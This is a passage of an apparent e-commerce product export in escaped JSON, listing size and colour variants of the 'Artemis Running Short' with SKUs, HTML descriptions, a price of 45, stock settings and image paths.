Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1907\":{\"sku\":\"WSH04-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-28-Orange\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1908\":{\"sku\":\"WSH04-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-29-Black\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1909\":{\"sku\":\"WSH04-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-29-Green\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1910\":{\"sku\":\"WSH04-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-29-Orange\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1911\":{\"sku\":\"WSH04-30-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-30-Black\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-30-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Black\"},\"1912\":{\"sku\":\"WSH04-30-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-30-Green\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-30-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Green\"},\"1913\":{\"sku\":\"WSH04-30-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-30-Orange\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-30-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Orange\"},\"1914\":{\"sku\":\"WSH04-31-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-31-Black\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-31-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Black\"},\"1915\":{\"sku\":\"WSH04-31-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-31-Green\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable 